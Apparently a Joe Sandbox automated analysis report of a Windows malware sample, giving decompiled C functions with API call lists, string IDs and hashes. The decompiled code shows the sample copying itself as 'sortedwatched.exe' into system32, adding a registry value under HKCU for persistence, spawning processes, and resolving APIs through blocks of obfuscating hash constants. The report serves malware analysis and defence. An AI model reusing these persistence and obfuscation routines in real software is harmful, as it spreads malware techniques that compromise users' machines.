                  				_v416 = 0x5042b9f5;
                  				_v412 = 0xa93c3553;
                  				_v408 = 0x5a85ccd8;
                  				_v404 = 0xad4d5cb9;
                  				_v400 = 0x72223e4b;
                  				_v396 = 0xa39693a8;
                  				_v392 = 0xef1aadfd;
                  				_v388 = 0x6cbdb06a;
                  				_v384 = 0xd7d937f8;
                  				_v380 = 0x596db643;
                  				_v376 = 0x230ce0c7;
                  				_v372 = 0x2d4bd8be;
                  				_v368 = 0xb37400f3;
                  				_v364 = 0x76b2403b;
                  				_v360 = 0xe15bf8ce;
                  				_v356 = 0xfc854871;
                  				_v352 = 0x6777c410;
                  				_v348 = 0xa6813d08;
                  				_v344 = 0x61441dae;
                  				_v340 = 0x7bc73fac;
                  				_v336 = 0xa81f123a;
                  				_v332 = 0x2f60e4b5;
                  				_v328 = 0x4165078e;
                  				_v324 = 0x81b3b60d;
                  				_v320 = 0x2f424b6a;
                  				_v316 = 0xe18acee1;
                  				_v312 = 0x40cb9f46;
                  				_v308 = 0xdcd07e81;
                  				_v304 = 0x77d948c4;
                  				_v300 = 0x8a50f65;
                  				_v296 = 0x69aaae5c;
                  				_v292 = 0x9aa1a84c;
                  				_v288 = 0x1177fe62;
                  				_v284 = 0x215e105a;
                  				_v280 = 0x568272bb;
                  				_v276 = 0x5f8f9ba2;
                  				_v272 = 0xae54d071;
                  				_v268 = 0x6814f89b;
                  				_v264 = 0x256969df;
                  				_v260 = 0x40871313;
                  				_v256 = 0x6ce1575a;
                  				_v252 = 0xbd3d788c;
                  				_v248 = 0x7ca8f87d;
                  				_v244 = 0x85fa53e6;
                  				_v240 = 0xd148325c;
                  				_v236 = 0x5e7ec80d;
                  				_v232 = 0xfdf502b7;
                  				_v228 = 0x2c986a2a;
                  				_v224 = 0xddbf220;
                  				_v220 = 0x4615f74b;
                  				_v216 = 0x5ca4c89f;
                  				_v212 = 0x146daa39;
                  				_v208 = 0xc823a9eb;
                  				_v204 = 0x367ea921;
                  				_v200 = 0xa498042b;
                  				_v196 = 0xca2acd0c;
                  				_v192 = 0xcac29f8f;
                  				_v188 = 0x581c0af8;
                  				_v184 = 0x54e383ca;
                  				_v180 = 0xe1d640da;
                  				_v176 = 0x26176d9b;
                  				_v172 = 0x44ba6c41;
                  				_v168 = 0xc7a769a8;
                  				_v164 = 0x14207816;
                  				_v160 = 0x60a483b3;
                  				_v156 = 0x2ec84207;
                  				_v152 = 0x55861a6c;
                  				_v148 = 0x9395ac55;
                  				_v144 = 0x7b3d468b;
                  				_v140 = 0xd742a34c;
                  				_v136 = 0xba1c8499;
                  				_v132 = 0xeedaef98;
                  				_v128 = 0x6fb05dd;
                  				_v124 = 0x51e8e4bc;
                  				_v120 = 0x78b88ff1;
                  				_v116 = 0xbd2f7124;
                  				_v112 = 0x56393da7;
                  				_v108 = 0xfe67bd5c;
                  				_v104 = 0x6bdb93e9;
                  				_v100 = 0xcd10dc31;
                  				_v96 = 0x10fa8214;
                  				_v92 = 0x66a75e2c;
                  				_v88 = 0xd4e5c57c;
                  				_v84 = 0xd9860dbd;
                  				_v80 = 0x6c05994b;
                  				_v76 = 0x3a6c9168;
                  				_v72 = 0x3ac0a209;
                  				_v68 = 0xeded3b06;
                  				_v64 = 0xc4e5c3d3;
                  				_v60 = 0x7666b774;
                  				_v56 = 0x18554a2e;
                  				_v52 = 0x9ba375a9;
                  				_v48 = 0x4225f3c7;
                  				_v44 = 0x59ee853;
                  				_v40 = 0xbef69b19;
                  				_v36 = 0x369b917b;
                  				_v32 = 0x5d702853;
                  				_v28 = 0x77e322b0;
                  				_v24 = 0x283b69ec;
                  				_v20 = 0x1e83f9c3;
                  				_v16 = 0xacacd89d;
                  				_v12 = 0x5dd1b9f2;
                  				_v8 = 0xedfd234e;
                  				_t186 = E00401A52(0x412360, 0x72fc3a35);
                  				 *0x4164f8 = LoadLibraryW(_t177);
                  				L00401B09(_t186);
                  				_push(0x415490);
                  				_push(0x6ae14ef1);
                  				return E004012FF( *0x4164f8,  &_v704, 0xaf);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040A28F
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: K>"r$S(p]$Ul~$ZWl$i)68$jKB/$i;(
                  • API String ID: 1029625771-3790624641
                  • Opcode ID: 0a649403d8d360f2a31862833572a2dea479a68f40ac8d43144fbebdc44cd8d9
                  • Instruction ID: 14f22b25c2d513f9b0b165bc48c778ba0d1b191eebadfcd767fb7a1b2c45f88c
                  • Opcode Fuzzy Hash: 0a649403d8d360f2a31862833572a2dea479a68f40ac8d43144fbebdc44cd8d9
                  • Instruction Fuzzy Hash: 3FE196B4C06369CFDB618F86AA897CDBB70BB01704F6082C9C5993B215CB755AC6CF85
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 84%
                  			E0040F9DF() {
                  				void* _v8;
                  				char _v528;
                  				void* _t8;
                  				void* _t12;
                  				void* _t20;
                  				void* _t30;
                  				signed int _t31;
                  				void* _t33;
                  
                  				if( *0x415f4c == 0) {
                  					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
                  					_t31 =  *0x4143a4( &_v528, 0x104, _t9, "C:\Windows\system32\sortedwatched.exe", _t30, _t33, _t20);
                  					_t12 = L00401B09(_t34);
                  					if(_t31 > 0) {
                  						_t36 = E00401A52(0x412be0, 0x4bf67e71);
                  						if(RegCreateKeyExW(0x80000001, _t13, 0, 0, 0, 2, 0,  &_v8, 0) == 0) {
                  							RegSetValueExW(_v8, "sortedwatched", 0, 1,  &_v528, 2 + _t31 * 2);
                  							RegCloseKey(_v8);
                  						}
                  						_t12 = L00401B09(_t36);
                  					}
                  					return _t12;
                  				}
                  				return _t8;
                  			}

                  APIs
                  • _snwprintf.NTDLL ref: 0040FA1D
                  • RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000002,00000000,0040C715,00000000), ref: 0040FA54
                  • RegSetValueExW.ADVAPI32(0040C715,sortedwatched,00000000,00000001,?,00000000), ref: 0040FA78
                  • RegCloseKey.ADVAPI32(0040C715), ref: 0040FA81
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreateValue_snwprintf
                  • String ID: C:\Windows\system32\sortedwatched.exe$g8Cw$sortedwatched
                  • API String ID: 1044119080-1568575355
                  • Opcode ID: 60bf88f92e863372fde177faa1f2e9ee41820f5811c66e19c34b9d099638a4c2
                  • Instruction ID: ae6d8057d6044da2fd1c6008afec86d0aa78eac3dd708c417e1b6433d3ba4775
                  • Opcode Fuzzy Hash: 60bf88f92e863372fde177faa1f2e9ee41820f5811c66e19c34b9d099638a4c2
                  • Instruction Fuzzy Hash: D211CC71700208BFD710AB959D85FEB776DDB44785F10407BF909E3191EB749D448AA8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 87%
                  			E0040FB72(intOrPtr* __ecx, void* __edx, void* __eflags) {
                  				signed int _v8;
                  				void* _v20;
                  				void* _v24;
                  				char _v544;
                  				char _v1064;
                  				void* _t16;
                  				void* _t39;
                  
                  				_v8 = _v8 & 0x00000000;
                  				E0040FAA1( &_v544);
                  				_t16 = E0040F8E6( &_v544,  *__ecx,  *((intOrPtr*)(__ecx + 4)));
                  				if(_t16 != 0) {
                  					_t16 = E00401DCB( &_v8);
                  					if(_t16 != 0) {
                  						_t39 = E00401A52(0x412e50, 0x55009ce0);
                  						 *0x4143a4( &_v1064, 0x104, _t39,  &_v544);
                  						_t33 = _t39;
                  						L00401B09(_t39);
                  						if(E00401D2B( &_v1064, _t33, _v8,  &_v24) != 0) {
                  							CloseHandle(_v24);
                  							CloseHandle(_v20);
                  						}
                  						return CloseHandle(_v8);
                  					}
                  				}
                  				return _t16;
                  			}

                  APIs
                    • Part of subcall function 0040FAA1: lstrlenW.KERNEL32(?), ref: 0040FAB5
                    • Part of subcall function 0040FAA1: GetTickCount.KERNEL32 ref: 0040FAC5
                    • Part of subcall function 0040F8E6: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040F900
                    • Part of subcall function 0040F8E6: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040F917
                    • Part of subcall function 0040F8E6: CloseHandle.KERNEL32(00000000), ref: 0040F920
                    • Part of subcall function 00401DCB: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00401DD6
                    • Part of subcall function 00401DCB: CloseHandle.KERNEL32(00000000), ref: 00401DF6
                  • _snwprintf.NTDLL ref: 0040FBD3
                  • CloseHandle.KERNEL32(?), ref: 0040FC00
                  • CloseHandle.KERNEL32(?), ref: 0040FC09
                  • CloseHandle.KERNEL32(00000000), ref: 0040FC12
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$File$ActiveConsoleCountCreateSessionTickWrite_snwprintflstrlen
                  • String ID: g8Cw
                  • API String ID: 1860464474-3103284439
                  • Opcode ID: d21df1483eba43348c9a81eeec635097a7c991d75f1891da6298b92e764e64ff
                  • Instruction ID: aef8b5b249e02084cc47ae1663e45d8d954b77272b63b26d03dd396773520d47
                  • Opcode Fuzzy Hash: d21df1483eba43348c9a81eeec635097a7c991d75f1891da6298b92e764e64ff
                  • Instruction Fuzzy Hash: BA11867290011D9BDF21EB60DD05AEEB378EF44305F1044BAE905B21E1EB749F54CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 61%
                  			E00401CC2(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a8) {
                  				struct _PROCESS_INFORMATION _v20;
                  				struct _STARTUPINFOW _v88;
                  				void* _t22;
                  
                  				_t22 = 0x44;
                  				E00401503( &_v88, _t22);
                  				_v88.cb = 0x44;
                  				if(CreateProcessW(__ecx, __edx, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20) == 0) {
                  					return 0;
                  				}
                  				if(_a8 == 0) {
                  					CloseHandle(_v20);
                  					CloseHandle(_v20.hThread);
                  				} else {
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  				}
                  				return 1;
                  			}

                  APIs
                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401CF2
                  • CloseHandle.KERNEL32(?), ref: 00401D12
                  • CloseHandle.KERNEL32(0040F136), ref: 00401D1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: D$M vu
                  • API String ID: 2922976086-427032030
                  • Opcode ID: f759c0c4d4faa4ab7e3fcb7eaa698f336a99b085e6c1dbc9a5cb9a13423961d3
                  • Instruction ID: 78a74d64e74da198333939fe1c260d8d1ae2390c954a34ff9c8bd1b4990b218a
                  • Opcode Fuzzy Hash: f759c0c4d4faa4ab7e3fcb7eaa698f336a99b085e6c1dbc9a5cb9a13423961d3
                  • Instruction Fuzzy Hash: D7F0A472900108ABDB12DFA5DC04AEFB7BDEF45712B108036F916F71A0EB78AD058694
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 82%
                  			E0040F292() {
                  				void* _t3;
                  				void* _t7;
                  				void* _t10;
                  				void* _t15;
                  				void* _t18;
                  				void* _t19;
                  
                  				if( *0x415f4c == 0) {
                  					E0040F227();
                  				} else {
                  					E0040F214();
                  				}
                  				E00401503(0x416840, 0x104);
                  				_t3 = E00401A52(0x412bb0, 0x4bf67e71);
                  				_t19 = _t3;
                  				 *0x4143a4(0x416840, 0x104, _t19, "C:\Windows\system32", "sortedwatched", _t15, _t18, _t7);
                  				_t10 = _t19;
                  				return HeapFree(GetProcessHeap(), 0, _t10);
                  			}

                  APIs
                  • _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F214: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,C:\Windows\system32), ref: 0040F220
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf
                  • String ID: C:\Windows\system32$C:\Windows\system32\sortedwatched.exe$g8Cw$sortedwatched
                  • API String ID: 3078599568-3932404036
                  • Opcode ID: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction ID: e972b69ea5731f996dd58b1a7c700a453acaa9277561cdf85d49239cb67cc4b6
                  • Opcode Fuzzy Hash: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction Fuzzy Hash: D4E022203000106BC2207286AC457FB114ACBC2399B2180BFF90AB62D2CA7D8C06C37E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 50%
                  			E0040F227() {
                  				void* _t3;
                  				void* _t8;
                  				void* _t10;
                  				void* _t13;
                  				void* _t14;
                  
                  				 *0x414c14(0, 0x1c, 0, 0, 0x416a48, _t10, _t13);
                  				_t3 = E00401A52(0x412df0, 0x4bf67e71);
                  				_t14 = _t3;
                  				 *0x4143a4(0x416a48, 0x104, _t14, 0x416a48, "sortedwatched");
                  				_t8 = _t14;
                  				return HeapFree(GetProcessHeap(), 0, _t8);
                  			}

                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,C:\Windows\system32), ref: 0040F236
                  • _snwprintf.NTDLL ref: 0040F25A
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf
                  • String ID: C:\Windows\system32$g8Cw$sortedwatched
                  • API String ID: 3078599568-1150327775
                  • Opcode ID: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction ID: 86e21f4e142f409bbdd5896e6b5cbe9030aa6b7bc5bdc0fcc4a87da7cf4bd144
                  • Opcode Fuzzy Hash: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction Fuzzy Hash: 9FE0CD717401107BD31062656D09EF7695DDBD1FA1712403EBE0AE71D1E5748C41C27D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 81%
                  			E00408922(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				char _v388;
                  
                  				_v388 = 0xbe363562;
                  				_v384 = 0x358c1795;
                  				_v380 = 0xfc3978bd;
                  				_v376 = 0x5e88d697;
                  				_v372 = 0x1994d9f1;
                  				_v368 = 0x74012195;
                  				_v364 = 0x24e0d58c;
                  				_v360 = 0x21725a8d;
                  				_v356 = 0xa874821;
                  				_v352 = 0x8f4bb96f;
                  				_v348 = 0x7b30fa17;
                  				_v344 = 0x7ea7edad;
                  				_v340 = 0x48c44d52;
                  				_v336 = 0x2e75da4f;
                  				_v332 = 0x5ea70e4c;
                  				_v328 = 0x7310b874;
                  				_v324 = 0x673afa7a;
                  				_v320 = 0x7d7fe55;
                  				_v316 = 0x71d3ba3c;
                  				_v312 = 0x27174315;
                  				_v308 = 0xffc65c5a;
                  				_v304 = 0x71edd81f;
                  				_v300 = 0x88b5759d;
                  				_v296 = 0xa46eb22d;
                  				_v292 = 0x4e080454;
                  				_v288 = 0x773882f0;
                  				_v284 = 0x301340;
                  				_v280 = 0x27b6a846;
                  				_v276 = 0xd1630644;
                  				_v272 = 0x4beaf5bf;
                  				_v268 = 0x430858d;
                  				_v264 = 0xf02d0ada;
                  				_v260 = 0x21f77905;
                  				_v256 = 0xebc6db18;
                  				_v252 = 0x25fcc715;
                  				_v248 = 0x1f40551f;
                  				_v244 = 0xd9b12e44;
                  				_v240 = 0x41ea523d;
                  				_v236 = 0xeff774de;
                  				_v232 = 0x7e0b9da5;
                  				_v228 = 0x8adb486a;
                  				_v224 = 0xf7243b6d;
                  				_v220 = 0x2b80910;
                  				_v216 = 0xca5e3015;
                  				_v212 = 0x635d5a6e;
                  				_v208 = 0x46d9f790;
                  				_v204 = 0xd87c8cb3;
                  				_v200 = 0x3b391a04;
                  				_v196 = 0x80154553;
                  				_v192 = 0x26d9aa35;
                  				_v188 = 0xa780316d;
                  				_v184 = 0xcc58666d;
                  				_v180 = 0x1546d742;
                  				_v176 = 0xb874fe62;
                  				_v172 = 0x7dab30d9;
                  				_v168 = 0xae3670f3;
                  				_v164 = 0x2d39e7a8;
                  				_v160 = 0xc90b32b4;
                  				_v156 = 0xf86c708b;
                  				_v152 = 0x3d938887;
                  				_v148 = 0x857eaf68;
                  				_v144 = 0x4675d760;
                  				_v140 = 0x91021cb0;
                  				_v136 = 0x1e139331;
                  				_v132 = 0x9c4df91c;
                  				_v128 = 0xbf70c7da;
                  				_v124 = 0x1868d50e;
                  				_v120 = 0xaaeeea7a;
                  				_v116 = 0x676c626a;
                  				_v112 = 0x459ef5d;
                  				_v108 = 0xf6552739;
                  				_v104 = 0x628c522d;
                  				_v100 = 0x5094f550;
                  				_v96 = 0xdc8a394;
                  				_v92 = 0x753b5f8f;
                  				_v88 = 0xbcfd75c5;
                  				_v84 = 0xc39d1db2;
                  				_v80 = 0xfc32ffd;
                  				_v76 = 0xd8b5f26a;
                  				_v72 = 0xad049b88;
                  				_v68 = 0xaacdb83e;
                  				_v64 = 0x7a9519fc;
                  				_v60 = 0xa3bb9731;
                  				_v56 = 0x4be3cd7a;
                  				_v52 = 0xeb2ea36c;
                  				_v48 = 0xec09d4a5;
                  				_v44 = 0xf4140a91;
                  				_v40 = 0xb1a460b0;
                  				_v36 = 0x6fde7de0;
                  				_v32 = 0x1da135a9;
                  				_v28 = 0x1a3a8662;
                  				_v24 = 0xfe2095d7;
                  				_v20 = 0xf2fd9e2f;
                  				_v16 = 0xe2f8a12;
                  				_v12 = 0x2f79a8a3;
                  				_v8 = 0x33205105;
                  				_t107 = E00401A52(0x412780, 0x72fc3a35);
                  				 *0x4164f0 = LoadLibraryW(_t98);
                  				L00401B09(_t107);
                  				_push(0x413660);
                  				_push(0x3ccd278a);
                  				return E004012FF( *0x4164f0,  &_v388, 0x60);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 00408C9E
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: =RA$jblg$nZ]c
                  • API String ID: 1029625771-130541845
                  • Opcode ID: 1b1ed6e085e12f066a49fdef08a2a82bb6068c6974effbf6941084d5ca8307fb
                  • Instruction ID: e7cc7c87ab767eb4a20ce2cf539689b4304f70dc4dd1bc1fd0241874581f8c7a
                  • Opcode Fuzzy Hash: 1b1ed6e085e12f066a49fdef08a2a82bb6068c6974effbf6941084d5ca8307fb
                  • Instruction Fuzzy Hash: 9081C6B4C06368DBEB21DF8699857CDBB70FB45704F6086C8C2693B214DB304A86CF99
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040F883(WCHAR* __ecx) {
                  				short _t21;
                  				short _t24;
                  				short _t25;
                  				WCHAR* _t27;
                  				short _t30;
                  				signed int _t32;
                  				signed int _t33;
                  				signed int _t34;
                  				void* _t37;
                  
                  				_t27 = __ecx;
                  				lstrcpyW(__ecx, "C:\Windows\system32");
                  				_t32 = lstrlenW(_t27);
                  				_t21 = 0x5c;
                  				_t27[_t32] = _t21;
                  				_t33 = _t32 + 1;
                  				_t37 = (GetTickCount() & 0x0000000f) + 4;
                  				E00401E8F( &(_t27[_t33]), _t37);
                  				_t24 = 0x2e;
                  				_t34 = _t33 + _t37;
                  				_t30 = 0x65;
                  				_t27[_t34] = _t24;
                  				_t25 = 0x78;
                  				 *((short*)(_t27 + 2 + _t34 * 2)) = _t30;
                  				 *((short*)(_t27 + 4 + _t34 * 2)) = _t25;
                  				 *((short*)(_t27 + 6 + _t34 * 2)) = _t30;
                  				 *((short*)(_t27 + 8 + _t34 * 2)) = 0;
                  				return 0;
                  			}

                  APIs
                  • lstrcpyW.KERNEL32(?,C:\Windows\system32), ref: 0040F88E
                  • lstrlenW.KERNEL32(?), ref: 0040F895
                  • GetTickCount.KERNEL32 ref: 0040F8A5
                    • Part of subcall function 00401E8F: GetTickCount.KERNEL32(00000001,-00000004,?), ref: 00401EA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$lstrcpylstrlen
                  • String ID: C:\Windows\system32
                  • API String ID: 1913473829-2896066436
                  • Opcode ID: f29303cca2c36e1e583c5a6cd85068ee6764875e66978048a0fb2f6fbe9387fb
                  • Instruction ID: fa4d6f9086d2f062a8c468281c34a08385031fd9eafdca72e636224e2a785f14
                  • Opcode Fuzzy Hash: f29303cca2c36e1e583c5a6cd85068ee6764875e66978048a0fb2f6fbe9387fb
                  • Instruction Fuzzy Hash: C9F0F6236583056BD7205FE0EC89A563725DF44762F15D0B6EC09EF6A6EB74C841C3A4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 95%
                  			E0040284F(intOrPtr* __ecx) {
                  				char _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				void* _t89;
                  				void* _t90;
                  				signed int _t92;
                  				signed int _t93;
                  				signed int _t101;
                  				signed int _t126;
                  				int* _t128;
                  				char _t133;
                  				signed int _t135;
                  				signed int _t136;
                  				void* _t137;
                  				intOrPtr _t139;
                  				signed int _t141;
                  				void* _t142;
                  				signed int _t145;
                  				intOrPtr* _t148;
                  				signed int _t152;
                  				int _t153;
                  				intOrPtr _t154;
                  				int _t155;
                  				void* _t156;
                  
                  				_t148 = __ecx;
                  				_t142 = 8;
                  				if(__ecx == 0) {
                  					L22:
                  					_push(0xfffffffe);
                  					L23:
                  					_pop(_t89);
                  					return _t89;
                  				}
                  				_t128 =  *((intOrPtr*)(__ecx + 0x1c));
                  				if(_t128 == 0) {
                  					goto L22;
                  				}
                  				_t90 = 9;
                  				_t143 =  >  ? _t90 : _t142;
                  				_v20 =  *((intOrPtr*)(__ecx + 4));
                  				_t92 =  *(_t128 + 0x2af8);
                  				_v24 =  >  ? _t90 : _t142;
                  				 *(_t128 + 0x2af8) = 0;
                  				if( *(_t128 + 0xab04) >= 0) {
                  					 *(_t128 + 0x2afc) =  *(_t128 + 0x2afc) | 1;
                  					__eflags = _t92;
                  					if(_t92 == 0) {
                  						_t93 =  *(_t128 + 0x2af4);
                  						__eflags = _t93;
                  						if(_t93 == 0) {
                  							while(1) {
                  								_t131 =  *(_t128 + 0x2af0);
                  								_v8 =  *((intOrPtr*)(_t148 + 4));
                  								_v12 = 0x8000 -  *(_t128 + 0x2af0);
                  								_t101 = E00404AD4(_t128,  *_t148,  &_v8, _t128 + 0x2b04, _t128 + 0x2b04 + _t131,  &_v12, _t143);
                  								_t133 = _v8;
                  								 *(_t128 + 0xab04) = _t101;
                  								 *_t148 =  *_t148 + _t133;
                  								 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 4)) - _t133;
                  								 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t148 + 8)) + _t133;
                  								 *((intOrPtr*)(_t148 + 0x30)) =  *((intOrPtr*)(_t128 + 0x1c));
                  								_t135 = _v12;
                  								 *(_t128 + 0x2af4) = _t135;
                  								_t152 =  *(_t148 + 0x10);
                  								__eflags = _t135 - _t152;
                  								_v16 = _t101;
                  								_t153 =  <  ? _t135 : _t152;
                  								memcpy( *(_t148 + 0xc),  *(_t128 + 0x2af0) + 0x2b04 + _t128, _t153);
                  								 *(_t148 + 0xc) =  *(_t148 + 0xc) + _t153;
                  								_t156 = _t156 + 0x20;
                  								 *(_t148 + 0x10) =  *(_t148 + 0x10) - _t153;
                  								 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _t153;
                  								 *(_t128 + 0x2af4) =  *(_t128 + 0x2af4) - _t153;
                  								_t136 = _v16;
                  								_t145 =  *(_t128 + 0x2af4);
                  								 *(_t128 + 0x2af0) =  *(_t128 + 0x2af0) + _t153 & 0x00007fff;
                  								__eflags = _t136;
                  								if(_t136 < 0) {
                  									goto L3;
                  								}
                  								__eflags = _t136 - 1;
                  								if(_t136 != 1) {
                  									L18:
                  									__eflags = _t136;
                  									if(_t136 == 0) {
                  										__eflags = _t145;
                  										_t137 = 0xfffffffb;
                  										_t111 =  !=  ? _t137 : 1;
                  										return  !=  ? _t137 : 1;
                  									}
                  									__eflags =  *(_t148 + 0x10);
                  									if( *(_t148 + 0x10) == 0) {
                  										L8:
                  										_push(0xfffffffb);
                  										goto L23;
                  									}
                  									_t143 = _v24;
                  									continue;
                  								}
                  								__eflags = _v20;
                  								if(_v20 == 0) {
                  									goto L8;
                  								}
                  								goto L18;
                  							}
                  							goto L3;
                  						}
                  						_t154 =  *((intOrPtr*)(__ecx + 0x10));
                  						__eflags = _t93 - _t154;
                  						_t155 =  <  ? _t93 : _t154;
                  						memcpy( *(__ecx + 0xc),  *(_t128 + 0x2af0) + 0x2b04 + _t128, _t155);
                  						 *(_t148 + 0xc) =  *(_t148 + 0xc) + _t155;
                  						 *(_t148 + 0x10) =  *(_t148 + 0x10) - _t155;
                  						 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _t155;
                  						 *(_t128 + 0x2af4) =  *(_t128 + 0x2af4) - _t155;
                  						__eflags =  *(_t128 + 0xab04);
